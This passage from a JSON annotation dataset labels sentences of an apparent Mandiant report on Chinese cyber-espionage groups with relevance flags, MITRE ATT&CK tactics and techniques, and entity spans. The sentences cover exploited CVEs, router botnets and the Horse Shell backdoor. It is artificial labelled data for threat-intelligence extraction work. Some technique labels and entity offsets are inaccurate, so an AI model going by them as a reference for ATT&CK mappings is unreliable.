"context_before": "In several cases we observed evidence of the actor searching for email data of interest before staging it for exfiltration.", "sentence_text": "The actor showed specific interest in information of political or strategic interest to China.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s15-1c0960", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "The actor showed specific interest in information of political or strategic interest to China.", "sentence_text": "This included the global targeting of governments and organizations associated with verticals of high priority to China.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s16-b77ad7", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "This included the global targeting of governments and organizations associated with verticals of high priority to China.", "sentence_text": "Further, in the set of entities selected for focused data exfiltration, shell scripts were uncovered that targeted email domains and users from Ministries of Foreign Affairs (MFAs) of ASEAN member nations as well as individuals within foreign trade offices and academic research organizations in Taiwan and Hong Kong.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1020", "name": "Automated Exfiltration" } ], "procedure": "Use shell scripts to target email domains and users for focused data exfiltration.", "entities": [ { "text": "selected for focused data exfiltration", "start": 32, "end": 70, "label": "Action" }, { "text": "shell scripts", "start": 72, "end": 85, "label": "MalwareTool" }, { "text": "targeted email domains and users", "start": 106, "end": 138, "label": "Action" }, { "text": "email domains and users", "start": 115, "end": 138, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s17-7eae7c", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "Further, in the set of entities selected for focused data exfiltration, shell scripts were uncovered that targeted email domains and users from Ministries of Foreign Affairs (MFAs) of ASEAN member nations as well as individuals within foreign trade offices and academic research organizations in Taiwan and Hong Kong.", "sentence_text": "UNC4841 sought to disguise elements of its activity in a number of ways.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s18-349bdb", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "UNC4841 sought to disguise elements of its activity in a number of ways.", "sentence_text": "In addition to continuing the pattern of targeting a security appliance, UNC4841 sent emails with specially crafted TAR file attachments that exploited CVE-2023-2868 and allowed the attackers to execute arbitrary system commands with the elevated privileges of the ESG product (Figure 3).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" }, { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "sent malicious TAR attachments exploiting CVE-2023-2868 to execute commands", "entities": [ { "text": "UNC4841 ", "start": 73, "end": 81, "label": "ThreatActor" }, { "text": "sent emails ", "start": 81, "end": 93, "label": "Action" }, { "text": " TAR file attachments", "start": 115, "end": 136, "label": "MalwareTool" }, { "text": "exploited", "start": 142, "end": 151, "label": "Action" }, { "text": "CVE-2023-2868", "start": 152, "end": 165, "label": "Infrastructure_Indicator" }, { "text": "allowed", "start": 170, "end": 177, "label": "Action" }, { "text": "o execute arbitrary system commands", "start": 193, "end": 228, "label": "Action" }, { "text": " attackers ", "start": 181, "end": 192, "label": "ThreatActor" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s19-e712f6", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "In addition to continuing the pattern of targeting a security appliance, UNC4841 sent emails with specially crafted TAR file attachments that exploited CVE-2023-2868 and allowed the attackers to execute arbitrary system commands with the elevated privileges of the ESG product (Figure 3).", "sentence_text": "UNC4841 sent campaign emails with subject lines and body content designed to trigger spam filtering and discourage further investigation.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Send campaign emails crafted to trigger spam filtering and discourage investigation.", "entities": [ { "text": "UNC4841", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "sent campaign emails", "start": 8, "end": 28, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s20-251ac6", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "We assess that the subject line and body of the emails UNC4841 sent as part of this campaign were likely crafted to be caught in spam filters and discourage further investigation.", "sentence_text": "In some cases, UNC4841 used legitimate self-signed SSL temporary certificates that are shipped on ESG appliances for setup purposes as well as certificates stolen from victim environments to masquerade the command and control (C2) traffic.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "used legitimate/stolen certificates to masquerade C2 traffic", "entities": [ { "text": " UNC4841", "start": 14, "end": 22, "label": "ThreatActor" }, { "text": " legitimate self-signed SSL temporary certificates", "start": 27, "end": 77, "label": "Infrastructure_Indicator" }, { "text": " ESG appliances", "start": 97, "end": 112, "label": "Infrastructure_Indicator" }, { "text": " certificates", "start": 142, "end": 155, "label": "Infrastructure_Indicator" }, { "text": " stolen", "start": 155, "end": 162, "label": "Action" }, { "text": "command and control (C2) traffic", "start": 206, "end": 238, "label": "Infrastructure_Indicator" }, { "text": "masquerade", "start": 191, "end": 201, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s21-64a363", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "In some cases, UNC4841 used legitimate self-signed SSL temporary certificates that are shipped on ESG appliances for setup purposes as well as certificates stolen from victim environments to masquerade the command and control (C2) traffic.", "sentence_text": "Another remarkable element of this campaign was the threat actor’s aggressive response to remediation efforts and the activity going public.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s22-d9c53d", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "Another remarkable element of this campaign was the threat actor’s aggressive response to remediation efforts and the activity going public.", "sentence_text": "Following Barracuda’s vulnerability disclosure and initial remediation actions, UNC4841 countered by moving rapidly to alter its malware, employ additional persistence mechanisms, and move laterally in an attempt to maintain access to compromised environments.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574", "name": "Hijack Execution Flow" } ], "procedure": "alter malware, employ persistence, and move laterally", "entities": [ { "text": " UNC4841", "start": 79, "end": 87, "label": "ThreatActor" }, { "text": "malware", "start": 129, "end": 136, "label": "MalwareTool" }, { "text": "alter", "start": 119, "end": 124, "label": "Action" }, { "text": "employ additional persistence mechanisms", "start": 138, "end": 178, "label": "Action" }, { "text": "move laterally", "start": 184, "end": 198, "label": "Action" }, { "text": "maintain access to compromised environments.", "start": 216, "end": 260, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s23-7ecc06", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "Following Barracuda’s vulnerability disclosure and initial remediation actions, UNC4841 countered by moving rapidly to alter its malware, employ additional persistence mechanisms, and move laterally in an attempt to maintain access to compromised environments.", "sentence_text": "Barracuda currently recommends replacing compromised appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s24-54b23f", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "Barracuda currently recommends replacing compromised appliances.", "sentence_text": "Chinese cyber espionage groups exploited zero-day vulnerabilities in security and networking products during multiple campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploiting zero-days in security/networking products", "entities": [ { "text": "security and networking products", "start": 69, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "Chinese cyber espionage groups", "start": 0, "end": 30, "label": "ThreatActor" }, { "text": "exploited zero-day vulnerabilities", "start": 31, "end": 65, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s25-23faf7", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "Chinese cyber espionage groups exploited zero-day vulnerabilities in security and networking products during multiple campaigns.", "sentence_text": "described\nexploitation of CVE-2022-42475, a vulnerability in Fortinet's FortiOS SSL-VPN, with the earliest evidence dating to October 2022.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploitation of CVE-2022-42475 in FortiOS SSL-VPN", "entities": [ { "text": " CVE-2022-42475", "start": 25, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "exploitation ", "start": 10, "end": 23, "label": "Action" }, { "text": "FortiOS SSL-VPN", "start": 72, "end": 87, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s26-8475f8", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "described\nexploitation of CVE-2022-42475, a vulnerability in Fortinet's FortiOS SSL-VPN, with the earliest evidence dating to October 2022.", "sentence_text": "In December 2022, Citrix reported in-the-wild exploitation of CVE-2022-27518 in its Application Delivery Controller (ADC), which the U.S. National Security Agency (NSA)\nattributed\nto APT5.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploitation of CVE-2022-27518 in Citrix ADC", "entities": [ { "text": "CVE-2022-27518", "start": 62, "end": 76, "label": "Infrastructure_Indicator" }, { "text": "exploitation", "start": 46, "end": 58, "label": "Action" }, { "text": "Application Delivery Controller (ADC)", "start": 84, "end": 121, "label": "Infrastructure_Indicator" }, { "text": " APT5", "start": 182, "end": 187, "label": "ThreatActor" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s27-78dfdb", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "In December 2022, Citrix reported in-the-wild exploitation of CVE-2022-27518 in its Application Delivery Controller (ADC), which the U.S. National Security Agency (NSA)\nattributed\nto APT5.", "sentence_text": "In March 2022, Sophos reported in-the-wild exploitation of CVE-2022-1040 in its Firewall product, which Volexity linked to Chinese cyber espionage actors.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploitation of CVE-2022-1040 in Sophos Firewall", "entities": [ { "text": "Firewall ", "start": 80, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "CVE-2022-1040", "start": 59, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "exploitation", "start": 43, "end": 55, "label": "Action" }, { "text": " Chinese cyber espionage actors", "start": 122, "end": 153, "label": "ThreatActor" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s28-0ebed7", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "In March 2022, Sophos reported in-the-wild exploitation of CVE-2022-1040 in its Firewall product, which Volexity linked to Chinese cyber espionage actors.", "sentence_text": "investigated\nmultiple\nintrusions that occurred between August 2020 and March 2021 and involved exploitation of CVE-2021-22893 in Pulse Secure VPNs.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploitation of CVE-2021-22893 in Pulse Secure VPNs", "entities": [ { "text": "CVE-2021-22893", "start": 111, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "exploitation ", "start": 95, "end": 108, "label": "Action" }, { "text": " Pulse Secure VPNs", "start": 128, "end": 146, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s29-07ff2e", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "investigated\nmultiple\nintrusions that occurred between August 2020 and March 2021 and involved exploitation of CVE-2021-22893 in Pulse Secure VPNs.", "sentence_text": "In March 2021, Mandiant identified three zero-day vulnerabilities that were exploited in SonicWall's Email Security (ES) product (CVE-2021-20021, CVE-2021-20022, CVE-2021-20023).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploited zero-day vulnerabilities in SonicWall ES product", "entities": [ { "text": "CVE-2021-20021", "start": 130, "end": 144, "label": "Infrastructure_Indicator" }, { "text": " CVE-2021-20022", "start": 145, "end": 160, "label": "Infrastructure_Indicator" }, { "text": "CVE-2021-20023", "start": 162, "end": 176, "label": "Infrastructure_Indicator" }, { "text": "SonicWall's Email Security (ES)", "start": 89, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "exploited", "start": 76, "end": 85, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s30-ad211a", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "In March 2021, Mandiant identified three zero-day vulnerabilities that were exploited in SonicWall's Email Security (ES) product (CVE-2021-20021, CVE-2021-20022, CVE-2021-20023).", "sentence_text": "Chinese Actors Disguise External and Internal Traffic with Botnets and Tunnels More frequently in the last three years, Mandiant has identified examples of Chinese cyber espionage operations using botnets of compromised internet of things (IoT) devices, smart devices, and routers to disguise external traffic between C2 infrastructure and victim environments, as well as numerous malware families that include functionalities to covertly relay attacker traffic within compromised networks.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "using botnets and malware to disguise/relay traffic", "entities": [ { "text": "Chinese Actors", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "Disguise", "start": 15, "end": 23, "label": "Action" }, { "text": " compromised internet of things (IoT) devices", "start": 207, "end": 252, "label": "Infrastructure_Indicator" }, { "text": "smart devices", "start": 254, "end": 267, "label": "Infrastructure_Indicator" }, { "text": " routers", "start": 272, "end": 280, "label": "Infrastructure_Indicator" }, { "text": "disguise ", "start": 284, "end": 293, "label": "Action" }, { "text": " C2 infrastructure", "start": 317, "end": 335, "label": "Infrastructure_Indicator" }, { "text": "malware families", "start": 381, "end": 397, "label": "MalwareTool" }, { "text": " relay attacker traffic", "start": 438, "end": 461, "label": "Action" }, { "text": " compromised networks", "start": 468, "end": 489, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s31-953da1", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "Chinese Actors Disguise External and Internal Traffic with Botnets and Tunnels More frequently in the last three years, Mandiant has identified examples of Chinese cyber espionage operations using botnets of compromised internet of things (IoT) devices, smart devices, and routers to disguise external traffic between C2 infrastructure and victim environments, as well as numerous malware families that include functionalities to covertly relay attacker traffic within compromised networks.", "sentence_text": "We judge that the operators are using these tactics to evade detection and to complicate attribution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s32-1b4c9c", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "We judge that the operators are using these tactics to evade detection and to complicate attribution.", "sentence_text": "Botnet-as-Smokescreen We identified a number of examples of Chinese cyber espionage groups using botnets to obfuscate traffic between attackers and victim networks, including APT41, APT31, APT15, TEMP.Hex, and Volt Typhoon.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "Threat actors use botnets to obfuscate network traffic between attackers and victim systems.", "entities": [ { "text": "APT41", "start": 175, "end": 180, "label": "ThreatActor" }, { "text": "APT31", "start": 182, "end": 187, "label": "ThreatActor" }, { "text": "APT15", "start": 189, "end": 194, "label": "ThreatActor" }, { "text": "TEMP.Hex", "start": 196, "end": 204, "label": "ThreatActor" }, { "text": "Volt Typhoon", "start": 210, "end": 222, "label": "ThreatActor" }, { "text": "using botnets to obfuscate traffic between attackers and victim networks", "start": 91, "end": 163, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s33-bd3326", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "Botnet-as-Smokescreen\nWe identified a number of examples of Chinese cyber espionage groups using botnets to obfuscate traffic between attackers and victim networks, including APT41, APT31, APT15, TEMP.Hex, and Volt Typhoon.", "sentence_text": "In May 2023, Volt Typhoon targeted critical infrastructure organizations in the United States.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "Target critical infrastructure organizations in the United States.", "entities": [ { "text": "Volt Typhoon", "start": 13, "end": 25, "label": "ThreatActor" }, { "text": "targeted critical infrastructure organizations", "start": 26, "end": 72, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s34-21d4ae", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "In May 2023, Volt Typhoon targeted critical infrastructure organizations in the United States.", "sentence_text": "In conjunction with other techniques, likely intended to limit detection opportunities, the threat actor reportedly used a botnet of compromised SOHO devices to route network traffic.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Proxy: Multi-hop Proxy" } ], "procedure": "Use a botnet of compromised SOHO devices to route network traffic and limit detection opportunities.", "entities": [ { "text": "limit detection opportunities", "start": 57, "end": 86, "label": "Action" }, { "text": "threat actor", "start": 92, "end": 104, "label": "ThreatActor" }, { "text": "used a botnet of compromised SOHO devices", "start": 116, "end": 157, "label": "Action" }, { "text": "compromised SOHO devices", "start": 133, "end": 157, "label": "Infrastructure_Indicator" }, { "text": "route network traffic", "start": 161, "end": 182, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s35-201233", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": "In conjunction with other techniques, likely intended to limit detection opportunities, the threat actor reportedly used a botnet of compromised SOHO devices to route network traffic.", "sentence_text": "In 2023, CheckPoint described a suspected Chinese cyber espionage group it describes as “Camaro Dragon” using a custom backdoor dubbed “Horse Shell” in activity targeting European foreign affairs organizations.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "using custom backdoor to target foreign affairs organizations", "entities": [ { "text": "d Chinese cyber espionage group", "start": 40, "end": 71, "label": "ThreatActor" }, { "text": "Camaro Dragon", "start": 89, "end": 102, "label": "ThreatActor" }, { "text": " custom backdoor dubbed “Horse Shell”", "start": 111, "end": 148, "label": "MalwareTool" }, { "text": "targeting ", "start": 161, "end": 171, "label": "Action" }, { "text": " European foreign affairs organizations", "start": 170, "end": 209, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s36-99987f", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "In 2023, CheckPoint described a suspected Chinese cyber espionage group it describes as “Camaro Dragon” using a custom backdoor dubbed “Horse Shell” in activity targeting European foreign affairs organizations.", "sentence_text": "The attackers implanted Horse Shell within a modified TP-Link router firmware image.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1542.001", "name": "System Firmware" } ], "procedure": "malicious implant within modified router firmware", "entities": [ { "text": "The attackers", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "implanted Horse Shell within a modified TP-Link router firmware image", "start": 14, "end": 83, "label": "Action" }, { "text": "Horse Shell", "start": 24, "end": 35, "label": "MalwareTool" }, { "text": "TP-Link router firmware image", "start": 54, "end": 83, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s37-e3dcf4", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "The attackers implanted Horse Shell within a modified TP-Link router firmware image.", "sentence_text": "It enables the attacker to establish an SSH encrypted SOCKS proxy and transfer files.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.001", "name": "Internal Proxy" } ], "procedure": "establish SSH SOCKS proxy and transfer files", "entities": [ { "text": "attacker", "start": 15, "end": 23, "label": "ThreatActor" }, { "text": "enables ", "start": 3, "end": 11, "label": "Action" }, { "text": " transfer files", "start": 69, "end": 84, "label": "Action" }, { "text": " establish an SSH encrypted SOCKS proxy", "start": 26, "end": 65, "label": "Action" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s38-f0c2ee", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "It enables the attacker to establish an SSH encrypted SOCKS proxy and transfer files.", "sentence_text": "CheckPoint assesses that the threat actor infected residential routers to obfuscate traffic between command and control servers and compromised victims.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "infected routers to obfuscate C2 traffic", "entities": [ { "text": " threat actor", "start": 28, "end": 41, "label": "ThreatActor" }, { "text": "infected", "start": 42, "end": 50, "label": "Action" }, { "text": " residential routers", "start": 50, "end": 70, "label": "Infrastructure_Indicator" }, { "text": " obfuscate traffic", "start": 73, "end": 91, "label": "Action" }, { "text": " command and control servers", "start": 99, "end": 127, "label": "Infrastructure_Indicator" }, { "text": "compromised victims", "start": 132, "end": 151, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s39-5283fa", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "CheckPoint assesses that the threat actor infected residential routers to obfuscate traffic between command and control servers and compromised victims.", "sentence_text": "In 2022 PricewaterhouseCoopers (PwC)\nreported\non BPFDOOR malware, which allegedly received commands from virtual private servers (VPS) that were controlled by a network of Taiwan-based compromised routers.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": ": malware receiving commands from VPS via compromised routers", "entities": [ { "text": "BPFDOOR malware", "start": 49, "end": 64, "label": "MalwareTool" }, { "text": "received commands", "start": 82, "end": 99, "label": "Action" }, { "text": "virtual private servers (VPS)", "start": 105, "end": 134, "label": "Infrastructure_Indicator" }, { "text": " network of Taiwan-based compromised routers", "start": 160, "end": 204, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s40-b21458", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "In 2022 PricewaterhouseCoopers (PwC)\nreported\non BPFDOOR malware, which allegedly received commands from virtual private servers (VPS) that were controlled by a network of Taiwan-based compromised routers.", "sentence_text": "PwC also\nreported\nthat it observed Chinese cyber espionage actor Red Vulture using a shared proxy network dubbed RedRelay in 2021 and 2022.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "using shared proxy network", "entities": [ { "text": " Chinese cyber espionage actor Red Vulture", "start": 34, "end": 76, "label": "ThreatActor" }, { "text": "shared proxy network", "start": 85, "end": 105, "label": "Infrastructure_Indicator" }, { "text": " RedRelay", "start": 112, "end": 121, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s41-9a0fc0", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "PwC also\nreported\nthat it observed Chinese cyber espionage actor Red Vulture using a shared proxy network dubbed RedRelay in 2021 and 2022.", "sentence_text": "French and U.S. authorities issued public reports highlighting Chinese state sponsored actors’ exploitation of network devices such as small office/home office (SOHO) routers to route traffic between C2 infrastructure and victim networks (see Figure 4).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s42-ae9ec3", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "French and U.S. authorities issued public reports highlighting Chinese state sponsored actors’ exploitation of network devices such as small office/home office (SOHO) routers to route traffic between C2 infrastructure and victim networks (see Figure 4).", "sentence_text": "The 2022 U.S.\nadvisory\nalso mentions exploitation of Network Attached Storage (NAS) devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s43-4feec6", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "The 2022 U.S.\nadvisory\nalso mentions exploitation of Network Attached Storage (NAS) devices.", "sentence_text": "The 2021 French advisory describes a specific campaign they attribute to APT31.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s44-701225", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "The 2021 French advisory describes a specific campaign they attribute to APT31.", "sentence_text": "ESET reportedly observed a Linux backdoor they track as SideWalk used to compromise a Hong Kong university in February 2021.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s45-070456", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 45, "context_before": "ESET\nreportedly\nobserved a Linux backdoor they track as SideWalk used to compromise a Hong Kong university in February 2021.", "sentence_text": "ESET believes SideWalk to be exclusively used by the SparklingGoblin APT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s46-22e2c0", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 46, "context_before": "ESET believes SideWalk to be exclusively used by the SparklingGoblin APT.", "sentence_text": "While they were unable to confidently identify the initial infection vector for this operation, they hypothesized that it could have been exploitation of a router vulnerability because of significant overlaps between SideWalk and a botnet malware, dubbed Specter, that Netlab 360 described in September 2020.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s47-a78eeb", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 47, "context_before": "While they were unable to confidently identify the initial infection vector for this operation, they hypothesized that it could have been exploitation of a router vulnerability because of significant overlaps between SideWalk and a botnet malware, dubbed Specter, that Netlab 360 described in September 2020.", "sentence_text": "Specter reportedly propagates by exploiting vulnerabilities in AVTECH IP camera, NVR, and DVR devices.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1210", "name": "Exploitation of Remote Services" } ], "procedure": "Propagates by exploiting vulnerabilities in AVTECH IP camera, NVR, and DVR devices.", "entities": [ { "text": "Specter", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "propagates by exploiting vulnerabilities in AVTECH IP camera, NVR, and DVR devices", "start": 19, "end": 101, "label": "Action" }, { "text": "AVTECH IP camera", "start": 63, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "NVR", "start": 81, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "DVR devices", "start": 90, "end": 101, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-38_mandiant_report-p1-s49-f556f5", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 49, "context_before": "NSA\n)", "sentence_text": "Your Router is My Router Conclusion Use of botnets, proxying traffic in a compromised network, and targeting edge devices are not new tactics, nor are they unique to Chinese cyber espionage actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s50-f376a8", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "Your Router is My Router Conclusion Use of botnets, proxying traffic in a compromised network, and targeting edge devices are not new tactics, nor are they unique to Chinese cyber espionage actors.", "sentence_text": "We suggest that the military and intelligence restructure, evidence of shared development and logistics infrastructure, and legal and institutional structures directing vulnerability research through government authorities point to long term investments in equipping Chinese cyber operators with more sophisticated tactics, tools, and exploits to achieve higher success rates in gaining and maintaining access to high value networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s51-992273", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "We suggest that the military and intelligence restructure, evidence of shared development and logistics infrastructure, and legal and institutional structures directing vulnerability research through government authorities point to long term investments in equipping Chinese cyber operators with more sophisticated tactics, tools, and exploits to achieve higher success rates in gaining and maintaining access to high value networks.", "sentence_text": "The examples highlighted here indicate that these investments are bearing fruit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-38_mandiant_report-p1-s52-f495c0", "source": "mandiant", "doc_id": "38_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "The examples highlighted here indicate that these investments are bearing fruit.", "sentence_text": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nGTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 